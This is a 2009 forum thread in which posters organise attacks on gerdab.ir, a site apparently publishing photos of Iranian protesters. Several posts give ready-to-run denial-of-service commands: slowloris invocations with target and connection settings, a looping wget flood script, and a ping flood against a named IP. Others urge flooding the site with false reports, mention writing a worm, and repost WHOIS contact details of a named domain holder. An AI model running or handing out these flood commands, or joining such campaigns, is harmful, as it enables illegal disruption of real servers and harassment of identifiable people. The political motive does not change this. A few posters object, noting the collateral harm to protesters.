Customize

Site showing pictures of protesters!

Discussion in 'Help Iran Online' started by Unregistered, Jun 24, 2009.

  1. Flood it with fake information. If necessary, use Google translate. Or contact them in English and say you went to university with one of the people in the photo. Leave your "personal phone number" which turns out to be something they don't want to call. Phone sex? CIA swtichboard in USA? Be creative, and have a varying level of credibility, but above all else be HIGH VOLUME!
  2. Disregard op!

    Disregard original post! NiteOwl says if we attack this site, it will choke off internet access for the tweeters in Iran.
  3. ادای احترام به انتخابات ایران معترض : شما آیا
    قهرمانان

    Tribute to Iran Election Protesters: You Are Heroes
  4. domain: gerdab.ir
    remarks: (Domain Holder) Mehran Emami
    remarks: (Domain Holder Address) Hafte Tir Sq., Mofateh St., No.36,, Tehran, Tehran, IR
    admin-c: me337-irnic
    tech-c: me337-irnic
    zone-c: me337-irnic
    nserver: ns1.sinet.ir
    nserver: ns2.sinet.ir
    source: IRNIC # Filtered

    person: Mehran Emami
    remarks: ---
    address: ---
    e-mail: admin@gerdab.ir
    phone: +98 21 22461580
    fax-no:
    nic-hdl: me337-irnic
    source: IRNIC # Filtered

    Registration information: ??????? ???? ??? ????? ????-????? (?.ir) ? ??????
  5. Wrong. NiteOwl is partially correct. If you DDoS it will choke off protesters' internet. If you Slowloris (Slowloris HTTP DoS) it will not, but you have to keep slowloris open to keep the site down.

    If you flood it with fake information, provided the interval between each message you send is high enough (say, 3s), you won't significantly slow down protesters' internet, i don't think -- can someone more technically knowledgable than me confirm this?

    Also, remember that guy posted the commentposter script - RapidShare: Easy Filehosting
  6. A well written worm would be more effective IMO.
  7. tim new Member

    Site was down but is now back up - has 24 photos with several photos having multiple faces circled

    ? Would it be better/more productive to inundate the site with false information? Photo 1 shows John wang, photo 1 shows Amadinejad, etc.... If they have several hundred or thousands of false names for each photo to wade through

    Not sure we have enough Farsi speakers to do it but it is a thought
  8. kill it

    gerdab.ir this needs treatment.
  9. What about this one too? Farsi I can't understand.

    ahestan.wordpress.com
  10. The gerdab.ir site has added another picture, to bring the count to 25. Can we all decide on what to do about this site and spread the word? I feel like no one's really taking that site very seriously
  11. gerdab.ir & Vagheeiat

    "this user: @Vagheeiat is a government agent, from IRG's cyber warfare group gerdab.ir"
    CFI

    I'll just leave this here.
  12. gerdab.ir is still not accepting traffic, at least not from my IP. If it's going down, it might have to be at it's gateway 81.12.13.129 i think.
  13. fucking. christ.

    no LOICing / DDoSing sites hosted in Iran, like gerdab.ir. It kills the protesters' internet too. And it's fucking useless anyways - gerdab.ir is already employing IP based blocking. At least with Slowloris your IP doesn't appear in the logs until after you stop lorising. Fuck.
  14. So what are our options, then? What can we do?
  15. Help needed to take down a site....

    http://www.gerdab.ir/fa/pages/?cid=407

    "We need all the help we can get to bring this site down, it is trying to identify protesters: http://bit.ly/XsjIK"

    This was posted on Twitter by ( ) who I believe is a valid source, however, I cannot read Farsi, so I am not sure what it is saying... Could someone look into this, please.

    Thank you.
  16. site showing pics of protestors

    can't we do something to get this site down- can we be sure name, address of owner listed on IP information is correct
  17. Thank you for replying and looking @ this. I am a computer newbie, so, I do not understand the techno talk- that is on the link you posted.

    I am hopeful if someone can read Farsi and this site is identifying protesters ( as the post was saying) that it is taken down!!! There are Red Target Circles drawn around protesters faces. :-(
  18. This needs to be looked up by someone who reads farsi and if its true, taken down immediately. lets keep this thread up.
  19. Has anything been done about this?
  20. It hasn't. Please take it down.
  21. Why is this being neglected?
  22. They're right.
    Among other things, it says that iranians are expected to turn in any data about the photo's, or people/websites mentioned.

    TAKE IT DOWN
  23. Roger that.

    SL is firing.
  24. Same here.
    It's still running, though..
    Running slowaris with timeout 240 , 5000 ports, and the -cache option
    Anybody else able to help???
  25. SL doing its thing here.
  26. It isn't, we're busy taking it down, but it seems we need more people to take it on.
    If there are any peope capable of running slowlaris, run it with the following options:

    slowlaris.pl -dns گرداب | Gerdab.ir -port 80 -timeout 240 -num 5000 -cache

    This site needs to go!

    Orla
  27. I meant to write:

    slowlaris.pl -dns گرداب | Gerdab.ir -port 80 -timeout 240 -num 5000 -cache

    Every minute this site is up, people risk geting thrown in jail.
    LETS BRING IT DOWN!
  28. Last try:

    slowlaris.pl -dns w-w-w.gerdab.ir -port 80 -timeout 240 -num 5000 -cache

    instead of the w-w-w , type www
  29. Here too, but it's not working.
    Strange, its an apache server, and should be susceptable to slowlars..
    I'm trying to think of a new way..
  30. Patriot Member

    are people no longer using this method?

    slowloris.pl -dns gerdab.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
  31. Use this bash script to attack the gerdab.ir
    -------------------------------------------------
    #!/bin/bash
    # Let this script run on your linux or Mac machine to help Iranian. Down with Dictators!

    while true; do

    wget --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" robots=off گرداب | Gerdab.ir

    rm -rf گرداب | Gerdab.ir

    done
    -----------------------------------------------------


    They block any agents and ping request
  32. How to take down their website

    By using NeoTrace I found out that it's IP number is: 81.12.13.144


    So try this (found it via Twitter):

    Go to START

    Click RUN

    Paste:
    ping -t -l 60000 81.12.13.144


    My guess is this works best if lots of people will do it.
  33. No good, they're blocking pings per other threads.
  34. I'm doing exactly as the above post says. Getting the message "Request timed out". Am I on the right track?
  35. Found the office address of www.gerdab.ir!!

    That's ugly :-(

    However, I did a whois on this site www.gerdab.ir, which is trying to hunt down protesters by showing their pictures. It appears that this website is registered by Soroush Rasaneh Institute in Teheran.

    I discovered this through the well-known website http://www.ip-adress.com/whois/
    This website gives lots of information on websites, like on which adress a website is registered.

    (it is all here, if you want to see for yourself:
    http://www.ip-adress.com/whois/81.12.13.144)

    netname: SINET-SHARIATI
    descr: Soroush Interactive Network
    descr: Tehran - Shariati POP
    country: IR
    admin-c: stt4-ripe
    tech-c: stt4-ripe
    status: ASSIGNED PA
    mnt-by: SINET-MNT
    source: RIPE # Filtered

    role: Sinet Technical Team
    address: Soroush Rasaneh Institute
    address: Tehran, IRAN 19959-63451
    address: No.91 , 5th East St., Seoul St.
    e-mail: ripe@sinet.ir

    These betrayers must stop posting pictures of their fellow civilians!

    Hold on, hope of Iran.

    J.
  36. not totally sure sorry about the office address!

    Sorry for the previous (possibly) impulsive post.

    This institute seems to be the general internet service of Iran or so? I really don't know.

    Hope i didn't upset anyone. I just want to help so badly! We here in West-Europe see (some of) the terrible things that happen and we want things to change for you, but there isn't much we can do. Governments are chicken shit to do something probably.

    J.
  37. Hechicera Member

    I'd take down the IP info, and where it is from. But that's just me.

    The site is hosted by a hosting firm in Iran, Soroush Resaneh Institute
    as per public info. It is probably either government or IRG owned, or shell-corp owned by someone or some fund well-connected to the status quo.

    Soroush Resaneh Institute

    This is the business contact page. No, do not attack it, that would be silly.

    But, if anyone feels like calling the public relations person, politely, a complaints campaign could be interesting. It is a work number. Politely. You don't want to give them more ammunition that protesters = terrorists. But at least they would get the message about how some of the rest of the world feels about hosting that site. What would be gold, is recording a phone call with the guy trying to rush you off. If you want to make that viral, make sure recording a phone call is legal where you live. It is for me, as long as one end (meaning me) knows it is being recorded.

    Btw, main site of gerdab has a single graphic, with only one button working. You need to be looking at http://www.gerdab.ir/home.php.

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins